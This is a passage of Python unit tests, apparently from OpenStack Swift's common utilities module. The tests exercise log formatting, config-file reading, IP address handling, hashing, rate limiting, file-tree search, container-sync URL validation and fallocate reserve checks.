self.assertEqual(strip_value(sio), '123\n')
formatter.max_line_length = 4
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234\n')
formatter.max_line_length = 5
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12345\n')
formatter.max_line_length = 6
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123456\n')
formatter.max_line_length = 7
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1 ... e\n')
formatter.max_line_length = -10
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test no txn on info message
self.assertEqual(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('txn' not in log_msg)
self.assertTrue('12345' not in log_msg)
# test txn already in message
self.assertEqual(logger.txn_id, '12345')
logger.warning('test 12345 test')
self.assertEqual(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assertTrue('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' in log_msg)
self.assertTrue('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' not in log_msg)
self.assertTrue('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.warning('test 1.2.3.4 test 12345')
self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
def test_storage_directory(self):
self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_expand_ipv6(self):
expanded_ipv6 = "fe80::204:61ff:fe9d:f156"
upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6))
omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6))
less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6))
def test_whataremyips(self):
myips = utils.whataremyips()
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_to_all(self):
for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000',
'::0', '::0000', '::',
# Wacky parse-error input produces all IPs
'I am a bear'):
myips = utils.whataremyips(any_addr)
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_ip_specific(self):
self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4'))
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with patch('netifaces.interfaces', my_interfaces), \
patch('netifaces.ifaddresses', my_ifaddress_error):
self.assertEqual(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with patch('netifaces.interfaces', my_ipv6_interfaces), \
patch('netifaces.ifaddresses', my_ipv6_ifaddresses):
myips = utils.whataremyips()
self.assertEqual(len(myips), 1)
self.assertEqual(myips[0], test_ipv6_address)
def test_hash_path(self):
# Yes, these tests are deliberately very fragile. We want to make sure
# that if someones changes the results hash_path produces, they know it
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''):
self.assertEqual(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEqual(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEqual(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
def test_validate_hash_conf(self):
# no section causes InvalidHashPathConfigError
self._test_validate_hash_conf([], [], True)
# 'swift-hash' section is there but no options causes
# InvalidHashPathConfigError
self._test_validate_hash_conf(['swift-hash'], [], True)
# if we have the section and either of prefix or suffix,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_prefix'], False)
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_suffix'], False)
# definitely, we have the section and both of them,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], False)
# But invalid section name should make an error even if valid
# options are there
self._test_validate_hash_conf(
['swift-hash-xxx'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], True)
def _test_validate_hash_conf(self, sections, options, should_raise_error):
class FakeConfigParser(object):
def read(self, conf_path):
return True
def get(self, section, option):
if section not in sections:
raise NoSectionError('section error')
elif option not in options:
raise NoOptionError('option error', 'this option')
else:
return 'some_option_value'
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
mock.patch('swift.common.utils.HASH_PATH_SUFFIX', ''), \
mock.patch('swift.common.utils.ConfigParser',
FakeConfigParser):
try:
utils.validate_hash_conf()
except utils.InvalidHashPathConfigError:
if not should_raise_error:
self.fail('validate_hash_conf should not raise an error')
else:
if should_raise_error:
self.fail('validate_hash_conf should raise an error')
def test_load_libc_function(self):
self.assertTrue(callable(
utils.load_libc_function('printf')))
self.assertTrue(callable(
utils.load_libc_function('some_not_real_function')))
self.assertRaises(AttributeError,
utils.load_libc_function, 'some_not_real_function',
fail_if_missing=True)
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEqual(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEqual(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEqual(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEqual(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
import pwd
self.assertEqual(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
groups.append(pwd.getpwnam(user).pw_gid)
self.assertEqual(set(groups), set(os.getgroups()))
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
def test_drop_privileges_no_call_setsid(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'chdir',
'umask')
bad_func_calls = ('setsid',)
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=bad_func_calls)
# exercise the code
utils.drop_privileges(user, call_setsid=False)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
for func in bad_func_calls:
self.assertTrue(func not in utils.os.called_funcs)
@reset_logger_state
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds)
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, [])
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assertTrue(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
finally:
utils.sys = _orig_sys
utils.os = _orig_os
@reset_logger_state
def test_get_logger_console(self):
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertTrue(console_handlers)
# make sure you can't have two console handlers
self.assertEqual(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEqual(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEqual(new_handler, old_handler)
def verify_under_pseudo_time(
self, func, target_runtime_ms=1, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('time.sleep', my_sleep), \
patch('eventlet.sleep', my_sleep):
start = time.time()
func(*args, **kwargs)
# make sure it's accurate to 10th of a second, converting the time
# difference to milliseconds, 100 milliseconds is 1/10 of a second
diff_from_target_ms = abs(
target_runtime_ms - ((time.time() - start) * 1000))
self.assertTrue(diff_from_target_ms < 100,
"Expected %d < 100" % diff_from_target_ms)
def test_ratelimit_sleep(self):
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, -5)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=250)
def test_ratelimit_sleep_with_incr(self):
def testfunc():
running_time = 0
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 248
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertEqual(248, total)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=500)
def test_ratelimit_sleep_with_sleep(self):
def testfunc():
running_time = 0
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=900)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEqual(parsed.scheme, 'http')
self.assertEqual(parsed.hostname, '127.0.0.1')
self.assertEqual(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEqual(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEqual(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEqual(parsed.hostname, '::1')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEqual(parsed.hostname, '')
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEqual(len(asdf), 1)
self.assertEqual(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEqual(len(app_bins), 2)
self.assertEqual(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEqual(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEqual(len(sub_ini), 1)
self.assertEqual(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEqual(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assertTrue(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEqual(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assertTrue(conf_dir in conf_dirs)
def test_search_tree_conf_dir_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.conf.d/base.conf',
'proxy-server/proxy-server.conf.d/pipeline.conf',
'proxy-server/proxy-noauth.conf.d/base.conf',
'proxy-server/proxy-noauth.conf.d/pipeline.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf',
dir_ext='noauth.conf.d')
self.assertEqual(len(conf_dirs), 1)
conf_dir = conf_dirs[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d')
self.assertEqual(conf_dir, expected)
def test_search_tree_conf_dir_pid_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.pid.d',
'proxy-server/proxy-noauth.pid.d',
)
with temptree(files) as t:
pid_files = utils.search_tree(t, 'proxy-server',
exts=['noauth.pid', 'noauth.pid.d'])
self.assertEqual(len(pid_files), 1)
pid_file = pid_files[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d')
self.assertEqual(pid_file, expected)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEqual(os.path.exists(file_name), False)
self.assertEqual(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assertTrue(os.path.exists(file_name))
self.assertEqual(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEqual(utils.human_readable(0), '0')
self.assertEqual(utils.human_readable(1), '1')
self.assertEqual(utils.human_readable(10), '10')
self.assertEqual(utils.human_readable(100), '100')
self.assertEqual(utils.human_readable(999), '999')
self.assertEqual(utils.human_readable(1024), '1Ki')
self.assertEqual(utils.human_readable(1535), '1Ki')
self.assertEqual(utils.human_readable(1536), '2Ki')
self.assertEqual(utils.human_readable(1047552), '1023Ki')
self.assertEqual(utils.human_readable(1048063), '1023Ki')
self.assertEqual(utils.human_readable(1048064), '1Mi')
self.assertEqual(utils.human_readable(1048576), '1Mi')
self.assertEqual(utils.human_readable(1073741824), '1Gi')
self.assertEqual(utils.human_readable(1099511627776), '1Ti')
self.assertEqual(utils.human_readable(1125899906842624), '1Pi')
self.assertEqual(utils.human_readable(1152921504606846976), '1Ei')
self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEqual(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEqual(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
fname = 'container-sync-realms.conf'
fcontents = '''
[US]
key = 9ff3b71c849749dbaec4ccdd3cbab62b
cluster_dfw1 = http://dfw1.host/v1/
'''
with temptree([fname], [fcontents]) as tempdir:
logger = FakeLogger()
fpath = os.path.join(tempdir, fname)
csr = ContainerSyncRealms(fpath, logger)
for realms_conf in (None, csr):
for goodurl, result in (
('http://1.1.1.1/v1/a/c',
(None, 'http://1.1.1.1/v1/a/c', None, None)),
('http://1.1.1.1:8080/a/c',
(None, 'http://1.1.1.1:8080/a/c', None, None)),
('http://2.2.2.2/a/c',
(None, 'http://2.2.2.2/a/c', None, None)),
('https://1.1.1.1/v1/a/c',
(None, 'https://1.1.1.1/v1/a/c', None, None)),
('//US/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/DFW1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//us/dfw1/a/c',
(None, 'http://dfw1.host/v1/a/c', 'US',
'9ff3b71c849749dbaec4ccdd3cbab62b')),
('//',
(None, None, None, None)),
('',
(None, None, None, None))):
if goodurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
goodurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
for badurl, result in (
('http://1.1.1.1',
('Path required in X-Container-Sync-To', None, None,
None)),
('httpq://1.1.1.1/v1/a/c',
('Invalid scheme \'httpq\' in X-Container-Sync-To, '
'must be "//", "http", or "https".', None, None,
None)),
('http://1.1.1.1/v1/a/c?query',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.1/v1/a/c?query=param#frag',
('Params, queries, and fragments not allowed in '
'X-Container-Sync-To', None, None, None)),
('http://1.1.1.2/v1/a/c',
("Invalid host '1.1.1.2' in X-Container-Sync-To",
None, None, None)),
('//us/invalid/a/c',
("No cluster endpoint for 'us' 'invalid'", None,
None, None)),
('//invalid/dfw1/a/c',
("No realm key for 'invalid'", None, None, None)),
('//us/invalid1/a/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a/'", None, None, None)),
('//us/invalid1/a',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/a'", None, None, None)),
('//us/invalid1/',
("Invalid X-Container-Sync-To format "
"'//us/invalid1/'", None, None, None)),
('//us/invalid1',
("Invalid X-Container-Sync-To format "
"'//us/invalid1'", None, None, None)),
('//us/',
("Invalid X-Container-Sync-To format "
"'//us/'", None, None, None)),
('//us',
("Invalid X-Container-Sync-To format "
"'//us'", None, None, None))):
if badurl.startswith('//') and not realms_conf:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
(None, None, None, None))
else:
self.assertEqual(
utils.validate_sync_to(
badurl, ['1.1.1.1', '2.2.2.2'], realms_conf),
result)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEqual(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception as e:
if e.__class__ is not expected:
raise
else:
self.assertEqual(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_replication_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n))
for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_rsync_module_interpolation(self):
fake_device = {'ip': '127.0.0.1', 'port': 11,
'replication_ip': '127.0.0.2', 'replication_port': 12,
'region': '1', 'zone': '2', 'device': 'sda1',
'meta': 'just_a_string'}
self.assertEqual(
utils.rsync_module_interpolation('{ip}', fake_device),
'127.0.0.1')
self.assertEqual(
utils.rsync_module_interpolation('{port}', fake_device),
'11')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}', fake_device),
'127.0.0.2')
self.assertEqual(
utils.rsync_module_interpolation('{replication_port}',
fake_device),
'12')
self.assertEqual(
utils.rsync_module_interpolation('{region}', fake_device),
'1')
self.assertEqual(
utils.rsync_module_interpolation('{zone}', fake_device),
'2')
self.assertEqual(
utils.rsync_module_interpolation('{device}', fake_device),
'sda1')
self.assertEqual(
utils.rsync_module_interpolation('{meta}', fake_device),
'just_a_string')
self.assertEqual(
utils.rsync_module_interpolation('{replication_ip}::object',
fake_device),
'127.0.0.2::object')
self.assertEqual(
utils.rsync_module_interpolation('{ip}::container{port}',
fake_device),
'127.0.0.1::container11')
self.assertEqual(
utils.rsync_module_interpolation(
'{replication_ip}::object_{device}', fake_device),
'127.0.0.2::object_sda1')
self.assertEqual(
utils.rsync_module_interpolation(
'127.0.0.3::object_{replication_port}', fake_device),
'127.0.0.3::object_12')
self.assertRaises(ValueError, utils.rsync_module_interpolation,
'{replication_ip}::object_{deivce}', fake_device)
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
